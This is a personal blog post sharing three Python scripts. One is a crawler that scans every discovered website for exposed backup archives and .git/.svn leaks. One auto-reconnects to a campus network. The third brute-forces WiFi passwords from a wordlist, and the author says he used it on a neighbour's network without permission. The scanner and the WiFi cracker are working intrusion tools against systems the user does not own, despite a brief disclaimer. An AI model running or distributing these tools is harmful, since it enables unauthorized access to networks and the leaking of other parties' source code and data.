>我真的太惨了

>外出实习忘记了博客密码

>断更了这么久

>今天终于忍不了了,ssh连上来黑了自己的首页,试图记录点什么

>2019/08/21 --C0d3r1iu

自己写的垃圾堆 – 记录日 – C0d3r1iu's Blog

自己写的垃圾堆

互联网,证明我来过。

贴一些小脚本:

 
ps:都是些垃圾,千万不要拿这些去破坏任何服务,脏手且入迷途
 

1.单线程简易版扫备份

intro : 这是寒假无聊写着玩的,挂了几天扫了不少,提交补天混一波零食~

Usage : 给website设定一个外链比较多的初始站点,配置好数据库,就可以自动爬取

Todo :

  1. 改成多线程或者其他IO,实现分发任务
  2. 持续优化、添加自适应备份文件名字典生成
#encoding = utf-8
"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: main.py
@Time: 2019/2/6 17:33
爬虫入口
"""

import requests,re,pymysql,traceback

# --- Crawler configuration -------------------------------------------------
website = 'http://www.2345.com'  # seed URL; pick a page with many outbound links
mysql_ip = '127.0.0.1'  # MySQL connection settings for the results database
mysql_user = 'root'
mysql_pass = 'root'
mysql_dbname = 'webinfo'
url_list = [website]  # crawl frontier, seeded with the start site
db = ''  # placeholder; replaced by a pymysql connection in controller()
timer = 0  # count of successful backup-file hits

#  Adaptive backup-filename generator
def get_check_url(url):
    """Yield candidate backup/VCS-leak URLs derived from *url*.

    Combines a fixed dictionary of common backup names with archive
    names built from the target's hostname and its second label
    (www.example.com -> 'example'). Tolerates URLs without a scheme
    and URLs carrying a path (the original crashed on the former and
    produced garbage names for the latter).
    """
    # Hostname: everything after '//' (if any) up to the first '/'.
    host = url.split('//', 1)[-1].split('/', 1)[0]
    labels = host.split('.')
    # Second label is usually the registrable name; fall back to the
    # whole host for single-label names.
    domain = labels[1] if len(labels) > 1 else host
    dic = [
        '.git/HEAD',
        '.svn/entries',
        '.DS_Store',
        '.svn/wc.db',
        'www.zip',
        'www.tar.gz',
        'www.rar',
        'wwwroot.zip',
        'wwwroot.tar.gz',
        'wwwroot.rar',
        '1.rar',
        '1.zip',
        'backup.rar',
        'backup.zip',
        'backupdata.rar',
        'backupdata.zip',
        host + '.rar',
        host + '.zip',
        host + '.tar.gz',
        domain + '.rar',
        domain + '.zip',
        domain + '.tar.gz'
    ]
    for name in dic:
        yield url + '/' + name

#  Probe candidate URLs and record those that look like real archives
def check(url):
    """Probe every candidate backup URL for *url*; store hits in the DB.

    A hit is a 200 response whose first raw byte is non-empty and not
    '<' (i.e. not an HTML error page) and whose Content-Type is an
    'application/*' type other than JSON. Each hit is inserted via
    Mysql_sec_insert and counted in the global timer.
    """
    global db
    global timer
    ua = {'User-Agent': 'Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;360SE)'}
    for candidate in get_check_url(url):
        try:
            print('[+] {} 正在探测...'.format(candidate))
            # stream=True so we can peek at the first byte without
            # downloading the whole (possibly huge) archive.
            resp = requests.get(candidate, headers=ua, timeout=5, stream=True)
            print(resp.status_code)
            if resp.status_code != 200:
                continue
            first_byte = resp.raw.read(1)
            print(first_byte)
            ctype = resp.headers['Content-Type']
            print(ctype)
            looks_like_archive = (
                first_byte != b'' and first_byte != b'<'
                and 'application' in ctype and 'json' not in ctype
            )
            if looks_like_archive and Mysql_sec_insert(db, {'url': candidate}):
                print('[+] {} 探测成功,已经入库'.format(candidate))
                timer += 1
        except Exception:
            print('[x] {} 探测失败'.format(candidate))
            traceback.print_exc()

#  Regex-extract every http(s) URL found in a page
def Find_URL(text):
    """Harvest http(s) URLs from *text* into the global url_list.

    Both the new matches and the merged frontier are deduplicated.
    Prints the raw (pre-dedup) match count for progress feedback.
    """
    global url_list
    # NOTE(review): the published regex had lost its backslashes
    # ('https?://w+.w+.?w+...'), so it matched literal 'w' runs and
    # almost no real URLs. Restored as a scheme-plus-hostname matcher.
    found = re.findall(r'https?://[\w.-]+', text)
    total = len(found)
    url_list = list(set(url_list) | set(found))
    print('[+] 此页面找到' + str(total) + '个URL')
    print('---------------------------------')

#  Open the MySQL connection
def Mysql_connect():
    """Return an open pymysql connection to the crawler database.

    Uses keyword arguments: the positional connect() signature the
    original relied on was removed in PyMySQL 1.0, so the old call
    breaks on current versions.
    """
    return pymysql.connect(host=mysql_ip, user=mysql_user,
                           password=mysql_pass, database=mysql_dbname)

#  Insert a crawled-site record
def Mysql_insert(db, info):
    """Insert one crawled-site record into the webinfo table.

    db   -- an open DB-API connection (pymysql in this project).
    info -- dict with 'url', 'title' and 'ok' keys.

    Returns True on success, False on failure (e.g. duplicate URL).
    The original interpolated values straight into the SQL string --
    a quoting syntax error and an SQL-injection hazard -- and never
    committed, so nothing was persisted.
    """
    cursor = db.cursor()
    try:
        cursor.execute(
            'insert into webinfo(url,title,is_ok) values(%s,%s,%s)',
            (info['url'], info['title'], info['ok']),
        )
        db.commit()
        return True
    except Exception:
        print('[x] 插入异常,URL可能已存在')
        return False

def Mysql_sec_insert(db, info):
    """Insert one vulnerable-backup URL into the vulurl table.

    db   -- an open DB-API connection.
    info -- dict with a 'url' key.

    Returns True on success, False on failure. The original returned
    None, so check()'s `if Mysql_sec_insert(...)` branch never fired
    and no hit was ever logged or counted; it also interpolated the
    value into the SQL (quoting syntax error, injection hazard) and
    never committed.
    """
    cursor = db.cursor()
    try:
        cursor.execute('insert into vulurl(url) values(%s)', (info['url'],))
        db.commit()
        return True
    except Exception:
        print('[x] 插入异常')
        return False

#  Fetch a page and harvest the URLs it contains
def Request_website(url):
    """Fetch *url*; on success feed its HTML to Find_URL and return 1.

    Returns 0 when the request fails. Dead commented-out title-parsing
    code and the unused info dict from the original were removed; the
    bare except was narrowed to requests' own exception hierarchy.
    """
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'}
    try:
        req = requests.get(url, timeout=5, headers=header)
    except requests.RequestException:
        print('[X] 页面访问失败')
        return 0
    Find_URL(req.text)
    print('[+] 页面访问成功,准备进行目录探测...')
    return 1

#  Main control loop: dispatches crawl/probe work
def controller():
    """Drain url_list: fetch each site, harvest new URLs, probe backups.

    Request_website() appends newly discovered URLs to the global
    url_list, so the outer while keeps running until the frontier is
    genuinely empty.
    """
    global timer
    global url_list
    global db
    db = Mysql_connect()
    while url_list:
        # Snapshot the frontier: the original aliased it
        # (tmp_list = url_list) and then removed items from it
        # mid-iteration, silently skipping every other entry.
        batch = list(url_list)
        print('[+] 本轮爬取任务:' + str(len(batch)) + ' 个')
        for target in batch:
            print('[+] ' + target + ' 为下一个目标')
            if Request_website(target) == 1:
                print('[+] 有效探测次数:' + str(timer))
                check(target)
                print('[-] 探测完毕,目标已去除')
            # Drop the target whether or not it was reachable; the
            # original left failures queued forever, spinning on
            # permanently dead hosts.
            if target in url_list:
                url_list.remove(target)
            print('[o] 还剩' + str(len(url_list)) + '个任务')
            print('++++++++++++++++++++++++++++++++++++++++')


# Script entry point: kick off the crawl/probe loop.
if __name__ == "__main__":
    controller()

 

2.校园网断网识别+自动重连

intro : 实验室台式机 or 服务器 24小时挂机必备辅助,主要应对校园网23点那一波全校范围断网,用来24小时PT站做种或者挂一些爬虫都是很OK的

Usage : SchWebDoctor.py 校园网账号 校园网密码

Todo : Nothing to do

"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: SchWebDoctor.py
@Time: 2018/3/15 20:06
校园网自动检测+连接
"""
import requests
import sys
import time

#  Detect disconnection; tune the poll interval to your needs (~10s is
#  suggested for overnight seeding). Relies on the captive portal
#  redirecting every request to its login page while the link is down.
def checker():
    """Probe an external page; return the portal queryString when offline.

    When the campus network is down, the HTTP request is answered with
    the ePortal login page (contains 'eportal/InterFace.do'); the text
    between 'jsp?' and the closing quote is the queryString the login
    POST needs. Returns False while we are still online.
    """
    probe = requests.get('http://www.recorday.cn')
    if 'eportal/InterFace.do' in probe.text:
        # NOTE(review): the published source was garbled here
        # (split(''</') is a syntax error); restored as "'</" -- the
        # quote-plus-tag terminating the redirect URL. Confirm against
        # the actual portal page. Also renamed the local, which
        # shadowed the function name.
        return probe.text.split('jsp?')[1].split("'</")[0]
    return False
if __name__ == "__main__":
    # Usage: SchWebDoctor.py <campus-account> <password>
    if len(sys.argv) == 3:
        username = sys.argv[1]
        password = sys.argv[2]
        # ePortal login endpoint (campus-internal address).
        url = 'http://172.26.156.158/eportal/InterFace.do?method=login'
        Login_Headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Host': '172.26.156.158',
            'Connection': 'Keep-Alive',
            'Accept-Encoding': 'gzip,deflate',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'
        }
        while True:
            params = checker()
            if params:
                # Offline: replay the portal login with the
                # queryString scraped from the redirect page.
                login_data = {
                    'userId': username,
                    'password': password,
                    'service': '',
                    'queryString': params,
                    'operatorPwd': '',
                    'operatorUserId': '',
                    'validcode': ''
                }
                requests.post(url, headers=Login_Headers, data=login_data)
            else:
                # Still online: re-check in 15 minutes.
                time.sleep(900)
    else:
        print(
        '''
        You Input An Error Params
        Usage:SchWebDoctor.py username password
        '''
        )
        # sys.exit() instead of the site-module exit(), which is not
        # guaranteed to exist when running as a plain script.
        sys.exit()

 

3.Wifi穷举

intro : 暑假去爷爷奶奶家没有wifi,拿邻居的wifi开干~

Usage : 需要设备打开无线上网功能,字典放到程序根目录命名为 password.txt 即可

Todo : 认证过程加速不了,无计可施 ~

"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: WifiCracker.py
@Time: 2018/7/20 16:23
Wifi密码穷举破解
"""

import pywifi
import sys
import time
from pywifi import const
# Initialize pywifi and grab the first wireless interface; start from a
# disconnected state so each crack attempt begins cleanly.
wifi = pywifi.PyWiFi()
ifcase = wifi.interfaces()[0]
ifcase.disconnect()
# print(ifcase)
# time.sleep(1)
# if ifcase.status() in [const.IFACE_DISCONNECTED,const.IFACE_INACTIVE]:
#     print("ok")

# usage: wificracker.py wifiname
def crack(ssid):
    """Try every password in password.txt against *ssid*; stop on a hit.

    Fixes vs. the original: the wordlist file is now closed (with
    block), and the trailing newline kept by readline() is stripped --
    previously every candidate was tested with a spurious newline
    appended, so a correct password could never match.
    """
    with open('password.txt', 'r') as f:
        for line in f:
            candidate = line.strip()
            if not candidate:
                # Skip blank lines instead of feeding empty keys to gic.
                continue
            try:
                if gic(ssid, candidate):
                    print('ok,the password is : ', candidate)
                    break
                print('fail,password: ', candidate)
                time.sleep(3)
            except Exception:
                print('caution!!')
                continue

def gic(ssid, password):
    """Attempt a single WPA2-PSK connection to *ssid* with *password*.

    Builds a fresh profile, connects, waits 5s for association, then
    always disconnects (with a 1s settle) before reporting whether the
    interface reached the connected state.
    """
    prof = pywifi.Profile()
    prof.ssid = ssid
    prof.auth = const.AUTH_ALG_OPEN
    prof.akm.append(const.AKM_TYPE_WPA2PSK)
    prof.cipher = const.CIPHER_TYPE_CCMP
    prof.key = password
    ifcase.remove_all_network_profiles()
    handle = ifcase.add_network_profile(prof)
    ifcase.connect(handle)
    time.sleep(5)
    connected = ifcase.status() == const.IFACE_CONNECTED
    ifcase.disconnect()
    time.sleep(1)
    return connected
# Entry point: the target SSID comes from the first CLI argument.
crack(sys.argv[1])

Comments are closed.

顶部
护眼
搜索
分享